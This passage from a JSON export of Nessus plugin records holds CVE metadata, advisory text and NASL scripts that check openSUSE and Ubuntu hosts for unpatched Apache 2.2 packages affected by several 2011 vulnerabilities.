"cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/75787", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5347.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75787);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)\");\n script_summary(english:\"Check for the apache2-5347 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added. Introduce new config option: Allow MaxRanges\nNumber of ranges requested, if exceeded, the complete content is\nserved. default: 200 0|unlimited: unlimited none: Range headers are\nignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a\nundefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods\nwith mod_proxy enabled and incorrect Rewrite or Proxy Rules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-11/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:50:06", "description": "This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a heap based buffer overflow could potentially allow local attackers to gain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1 only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with deleted binaries by message to stdout only, but refrain from sending signals.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2012:0212-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_APACHE2-111205.NASL", "href": "https://www.tenable.com/plugins/nessus/75788", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5520.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75788);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2012:0212-1)\");\n script_summary(english:\"Check for the apache2-5520 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes\nfor a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch\ndirectives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a\nheap based buffer overflow could potentially allow local attackers to\ngain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1\n only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with\n deleted binaries by message to stdout only, but refrain\n from sending signals.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-devel / apache2-example-certificates / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:42", "description": "It was discovered that the mod_proxy module in Apache did not properly interact with the RewriteRule and ProxyPassMatch pattern matches in the configuration of a reverse proxy. This could allow remote attackers to contact internal webservers behind the proxy that were not intended for external exposure. (CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache when used with mod_proxy_balancer in certain configurations could allow remote attackers to cause a denial of service via a malformed HTTP request. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for Apache did not properly handle certain configuration sections that specify NiceValue but not AssignUserID, preventing Apache from dropping privileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache.\nThe upstream patch introduced a regression in Apache when handling specific byte range requests. This update fixes the issue.\n\nA flaw was discovered in the byterange filter in Apache. A remote attacker could exploit this to cause a denial of service via resource exhaustion.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-11T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2, apache2-mpm-itk vulnerabilities (USN-1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1176", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-common", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1259-1.NASL", "href": "https://www.tenable.com/plugins/nessus/56778", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1259-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56778);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-1176\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(46953, 49616, 49957);\n script_xref(name:\"USN\", value:\"1259-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2, apache2-mpm-itk vulnerabilities (USN-1259-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the mod_proxy module in Apache did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache\nwhen used with mod_proxy_balancer in certain configurations could\nallow remote attackers to cause a denial of service via a malformed\nHTTP request. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for\nApache did not properly handle certain configuration sections that\nspecify NiceValue but not AssignUserID, preventing Apache from\ndropping privileges correctly. This issue only affected Ubuntu 10.04\nLTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache.\nThe upstream patch introduced a regression in Apache when handling\nspecific byte range requests. This update fixes the issue.\n\nA flaw was discovered in the byterange filter in Apache. A remote\nattacker could exploit this to cause a denial of service via resource\nexhaustion.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1259-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected apache2-mpm-itk, apache2.2-bin and / or\napache2.2-common packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.8-1ubuntu0.22\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.14-5ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.14-5ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.16-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.16-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.17-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.17-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.20-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mpm-itk / apache2.2-bin / apache2.2-common\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:49:51", "description": "This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a heap based buffer overflow could potentially allow local attackers to gain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1 only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with deleted binaries by message to stdout only, but refrain from sending signals.\n\n- httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n[bnc#727071]", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2012:0248-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-worker", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-111205.NASL", "href": "https://www.tenable.com/plugins/nessus/75427", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5519.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75427);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2012:0248-1)\");\n script_summary(english:\"Check for the apache2-5519 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes\nfor a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch\ndirectives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a\nheap based buffer overflow could potentially allow local attackers to\ngain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1\n only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with\n deleted binaries by message to stdout only, but refrain\n from sending signals.\n\n- httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make\nnon-ascii eg UTF8 passwords work with mod_authnz_ldap.\n[bnc#727071]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00044.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n 